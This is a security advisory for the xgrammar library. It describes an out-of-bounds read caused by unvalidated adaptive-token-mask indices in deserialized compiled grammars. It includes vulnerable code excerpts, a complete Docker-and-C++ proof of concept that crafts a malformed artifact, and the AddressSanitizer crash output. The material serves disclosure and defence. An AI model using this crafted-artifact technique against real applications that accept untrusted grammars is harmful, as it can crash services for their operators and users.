All advisories

Out-of-Bounds Read Through Deserialized Adaptive Cache Indices

mlc-ai/xgrammar / GHSA-hpfg-h6pv-4rjg

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Read Through Deserialized Adaptive Cache Indices

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

At assessed main revision f07ca3c, CompiledGrammar::DeserializeJSON accepts adaptive-token-mask indices without checking that they identify an element of the supplied tokenizer's sorted_decoded_vocab. An application is affected only if it accepts a serialized compiled grammar from an untrusted or less-trusted source and then uses the result in a GrammarMatcher; this is not a network attack by itself. With a one-entry vocabulary, an artifact containing accepted index 1 deserializes successfully and the next-token-mask operation reads one element past the vocabulary vector. A preserved AddressSanitizer run reports a heap-buffer-overflow in GrammarMatcher::Impl::FillBitmaskForStates, establishing an out-of-bounds read and a process-crash primitive; it does not by itself establish information disclosure or code execution.

Detail

The cache is generated for a specific tokenizer. Its accepted_indices, rejected_indices, and uncertain_indices are not token IDs: each is a positional index into TokenizerInfo::GetSortedDecodedVocab(). A valid artifact must therefore preserve the invariant 0 <= index < sorted_decoded_vocab.size() for every stored index.

The deserializer in cpp/compiled_grammar.cc checks that tokenizer metadata matches, but that check only establishes that the caller supplied tokenizer metadata of the expected shape and size. It does not validate each adaptive-mask index. The cache is then populated by AutoDeserializeJSONValue; at assessed revision f07ca3c its returned structural error is also discarded:

impl->tokenizer_info = tokenizer_info;
AutoDeserializeJSONValue(&(impl->adaptive_token_mask_cache), object["adaptive_token_mask_cache"]);
return std::nullopt;

Discarding the error is a separate robustness problem, but merely propagating it does not stop this PoC: [1] is a well-typed std::vector<int32_t>, so generic JSON deserialization succeeds. The root cause of this finding is the missing semantic range validation after the cache has been decoded and associated with the tokenizer.

The attacker selects store_type = 0 (kAccepted) and places 1 in accepted_indices. GrammarMatcher::Impl::FillBitmaskForStates in cpp/grammar_matcher.cc later treats that value as trusted and indexes the one-element vector with operator[]:

if (adaptive_token_mask.store_type == StoreType::kAccepted) {
  for (auto idx : adaptive_token_mask.accepted_indices) {
    tmp_accepted_bitset_.Set(sorted_decoded_vocab[idx].first, true);
  }
}

There is no intervening bounds check. The same invariant also matters for rejected_indices and uncertain_indices: those fields reach other matcher paths that index or compare positions in the same sorted vocabulary. Validation belongs at CompiledGrammar::DeserializeJSONValue, where the decoded cache and caller-supplied tokenizer first coexist, rather than relying on scattered checks at each matcher use.

The v0.2.6 preview branch contains fixes that propagate structural cache-deserialization errors and recompute derived cache metadata, but the inspected v0.2.6rc1 and v0.2.6rc2 snapshots still do not reject a well-typed out-of-range index. Those changes are therefore compatible hardening, not a fix for this semantic bounds violation.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

The following PoC logic is correct for assessed revision f07ca3c. It creates a valid artifact for a one-token vocabulary, changes only the first cached mask to the kAccepted representation with index 1, deserializes it, and asks the matcher to fill the next-token mask:

Run this command in a disposable container. It shallow-clones the current default branch, prints the resolved commit, builds the public C++ library with AddressSanitizer, changes one adaptive-cache index through the serialized public API, and requests a token mask.

docker run --rm -i debian:bookworm-slim bash <<'DOCKER'
set -euxo pipefail
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git submodule update --init --recursive --depth 1
git rev-parse HEAD
cat > config.cmake <<'CMAKE'
set(CMAKE_BUILD_TYPE Debug)
set(XGRAMMAR_BUILD_PYTHON_BINDINGS OFF)
set(XGRAMMAR_BUILD_CXX_TESTS OFF)
set(XGRAMMAR_ENABLE_CPPTRACE OFF)
set(XGRAMMAR_ENABLE_INTERNAL_CHECK OFF)
CMAKE
cmake -S . -B build -G Ninja \
  -DCMAKE_CXX_FLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
  -DCMAKE_EXE_LINKER_FLAGS='-fno-lto -fsanitize=address'
cmake --build build --target xgrammar -j2
cat > /tmp/repro.cc <<'CPP'
#include <picojson.h>
#include <xgrammar/compiler.h>
#include <xgrammar/matcher.h>
#include <xgrammar/tokenizer_info.h>
#include <cstdint>
#include <iostream>
#include <utility>
#include <variant>
#include <vector>

int main() {
  xgrammar::TokenizerInfo tokenizer({"a"});
  auto compiled = xgrammar::GrammarCompiler(tokenizer, 1, false).CompileGrammar("root ::= \"a\"");
  picojson::value artifact;
  if (!picojson::parse(artifact, compiled.SerializeJSON()).empty()) return 2;
  auto& cache = artifact.get<picojson::object>().at("adaptive_token_mask_cache")
                    .get<picojson::array>()[0].get<picojson::array>()[1].get<picojson::object>();
  cache["store_type"] = picojson::value(int64_t{0});
  cache["accepted_indices"] = picojson::value(
      picojson::array{picojson::value(int64_t{1})});
  cache["rejected_indices"] = picojson::value(picojson::array{});
  auto restored = xgrammar::CompiledGrammar::DeserializeJSON(artifact.serialize(), tokenizer);
  if (!std::holds_alternative<xgrammar::CompiledGrammar>(restored)) {
    std::cerr << "DESERIALIZATION_REJECTED\n";
    return 3;
  }
  std::cerr << "DESERIALIZATION_ACCEPTED\n";
  xgrammar::GrammarMatcher matcher(
      std::get<xgrammar::CompiledGrammar>(std::move(restored)));
  int32_t bits[1] = {0};
  int64_t shape[2] = {1, 1};
  int64_t strides[2] = {1, 1};
  DLTensor mask{bits, {kDLCPU, 0}, 2, {kDLInt, 32, 1}, shape, strides, 0};
  matcher.FillNextTokenBitmask(&mask);
}
CPP
g++ -std=c++17 -D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address \
  -fno-omit-frame-pointer -g \
  -Iinclude -I3rdparty/picojson -I3rdparty/dlpack/include \
  /tmp/repro.cc build/libxgrammar.a -pthread -ldl -o /tmp/repro
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0 \
  /tmp/repro
DOCKER

The run resolved f07ca3cb03affaca98809c4e9dad41deed2f7730, accepted the malformed artifact, and produced:

DESERIALIZATION_ACCEPTED
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
#0 xgrammar::GrammarMatcher::Impl::FillBitmaskForStates(...) cpp/grammar_matcher.cc:1880
#1 xgrammar::GrammarMatcher::Impl::FillNextTokenBitmask(...) cpp/grammar_matcher.cc:1700
0 bytes to the right of a 40-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow cpp/grammar_matcher.cc:1880
ABORTING

Credit

Zheng Yu @ Depthfirst